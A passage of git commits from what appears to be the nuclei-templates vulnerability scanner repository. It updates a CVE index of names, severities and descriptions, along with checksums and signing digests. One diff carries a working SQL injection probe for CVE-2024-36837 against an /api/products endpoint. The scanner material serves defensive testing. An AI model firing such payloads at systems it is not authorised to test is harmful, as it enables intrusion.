system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"} {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} @@ -2319,6 +2319,7 @@ {"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"} {"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} +{"ID":"CVE-2023-51449","Info":{"Name":"Gradio Hugging Face - Local File Inclusion","Severity":"high","Description":"Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio \u003c 3.33\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-51449.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-52085","Info":{"Name":"Winter CMS Local File Inclusion - (LFI)","Severity":"medium","Description":"Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-52085.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} @@ -2375,6 +2376,7 @@ {"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} +{"ID":"CVE-2024-1728","Info":{"Name":"Gradio \u003e 4.19.1 UploadButton - Path Traversal","Severity":"high","Description":"gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1728.yaml"} {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} @@ -2395,6 +2397,7 @@ {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} {"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"} +{"ID":"CVE-2024-2621","Info":{"Name":"Fujian Kelixin Communication - Command Injection","Severity":"medium","Description":"A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2621.yaml"} {"ID":"CVE-2024-26331","Info":{"Name":"ReCrystallize Server - Authentication Bypass","Severity":"high","Description":"This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-26331.yaml"} {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} @@ -2407,15 +2410,18 @@ {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} {"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"} {"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} +{"ID":"CVE-2024-28995","Info":{"Name":"SolarWinds Serv-U - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-28995.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} {"ID":"CVE-2024-3136","Info":{"Name":"MasterStudy LMS \u003c= 3.3.3 - Unauthenticated Local File Inclusion via template","Severity":"critical","Description":"The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'template' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \"safe\" file types can be uploaded and included.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3136.yaml"} {"ID":"CVE-2024-31621","Info":{"Name":"Flowise 1.6.5 - Authentication Bypass","Severity":"high","Description":"The flowise version \u003c= 1.6.5 is vulnerable to authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31621.yaml"} +{"ID":"CVE-2024-31750","Info":{"Name":"F-logic DataCube3 - SQL Injection","Severity":"high","Description":"SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-31750.yaml"} {"ID":"CVE-2024-31848","Info":{"Name":"CData API Server \u003c 23.4.8844 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData API Server \u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"} {"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} {"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"} {"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"} +{"ID":"CVE-2024-32113","Info":{"Name":"Apache OFBiz Directory Traversal - Remote Code Execution","Severity":"high","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32113.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} @@ -2426,6 +2432,7 @@ {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 42bcf971ec..17c52f1d63 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -ccfb062d74fe49f673c3566b7bedbb47 +5bf79d4f9b6c31dc26f1ae2f9acb7675 From 5b51116405898fc02c94fa769f3da1d121091a18 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 18 Jun 2024 15:31:29 +0530 Subject: [PATCH 0323/1841] Update CVE-2024-36837.yaml --- http/cves/2024/CVE-2024-36837.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml index 07badea610..14f7ff3d11 100644 --- a/http/cves/2024/CVE-2024-36837.yaml +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -19,10 +19,9 @@ variables: num: "{{rand_int(9000000, 9999999)}}" http: - - raw: - - | - GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550) HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)" matchers-condition: and matchers: From 8d464a51aede5240cb58432ed8cfc0ba08cf3bfc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:02:10 +0000 Subject: [PATCH 0324/1841] Auto Template Signing [Tue Jun 18 10:02:10 UTC 2024] :robot: --- http/cves/2024/CVE-2024-2621.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index e1915699de..72b9d76447 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -40,3 +40,4 @@ http: - 'status_code == 200' - 'contains_all(body,"msg\":","header\":","code\":")' condition: and +# digest: 4a0a00473045022100a52b0c5b76efaf890e2a47563d494a96fce85d7358a34a0b2ed4027e0dc1c2d202206721b9c12ec93f014b0111b14d53ef8e69c79a19ec1eb23f367c7823881fcd2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d661e74400d21230b40a6dddc5bcc607958945d6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 15:32:17 +0530 Subject: [PATCH 0325/1841] fix trail space --- http/cves/2024/CVE-2024-24565.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml index 7cfb0b9759..9c30892788 100644 --- a/http/cves/2024/CVE-2024-24565.yaml +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: medium description: | - CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. + CrateDB is a distributed SQL database that makes it simple to store and analyze massive amounts of data in real-time. There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 From ac39f6adac42dc62870bfad92141eb52bdd1fa0f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 10:03:26 +0000 Subject: [PATCH 0326/1841] Auto Generated New Template Addition List [Tue Jun 18 10:03:26 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 073acc474e..6d4fc0c62d 100644 --- a/.new-additions +++ b/.new-additions @@ -12,9 +12,11 @@ http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-1728.yaml http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-2621.yaml http/cves/2024/CVE-2024-28995.yaml http/cves/2024/CVE-2024-31750.yaml http/cves/2024/CVE-2024-32113.yaml +http/cves/2024/CVE-2024-3274.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml From 71cf8a62c7525dc880eca10b00e6e0a15c96346d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:03:33 +0000 Subject: [PATCH 0327/1841] Auto Generated Templates Checksum [Tue Jun 18 10:03:33 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f3903b9855..949a678047 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:15e3d2b258890ea3f6670c981a4b0703d98a1b98 -cves.json-checksum.txt:eb4c7db68b582f0cd4ecf6cdb67ff52c6532e739 +cves.json:bb4672b4751b17c034799fabf7d52f0c8aed3302 +cves.json-checksum.txt:b10cb415f16dd74d75e70e696defacaf045d8c3e dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3298,7 +3298,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3 -http/cves/2024/CVE-2024-2621.yaml:622f5f4912ee967b2fc330babc1eeeffcbe882b2 +http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d @@ -3327,6 +3327,7 @@ http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 +http/cves/2024/CVE-2024-3274.yaml:f86d17e3846a2056ffbcda16ab789507fc08c63e http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc @@ -8659,7 +8660,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5ed2312430930175d44fc75cf5d0628b5fbef212 +templates-checksum.txt:f97353790358110b1161c8e683260eab68c943d6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bf53cad2da7ccf0d6a521c30df9cd716b80e1d57 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 10:04:11 +0000 Subject: [PATCH 0328/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ef4fd1ef5f..0a16726a69 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,9 +17,11 @@ on: - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-1728.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-2621.yaml' - 'http/cves/2024/CVE-2024-28995.yaml' - 'http/cves/2024/CVE-2024-31750.yaml' - 'http/cves/2024/CVE-2024-32113.yaml' + - 'http/cves/2024/CVE-2024-3274.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 98d2c2d222a561e8d7a9b6f2d16c86a26408304b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 10:05:20 +0000 Subject: [PATCH 0329/1841] Auto Template Signing [Tue Jun 18 10:05:20 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3274.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3274.yaml b/http/cves/2024/CVE-2024-3274.yaml index 8bf36cd53f..4d3059dfb5 100644 --- a/http/cves/2024/CVE-2024-3274.yaml +++ b/http/cves/2024/CVE-2024-3274.yaml @@ 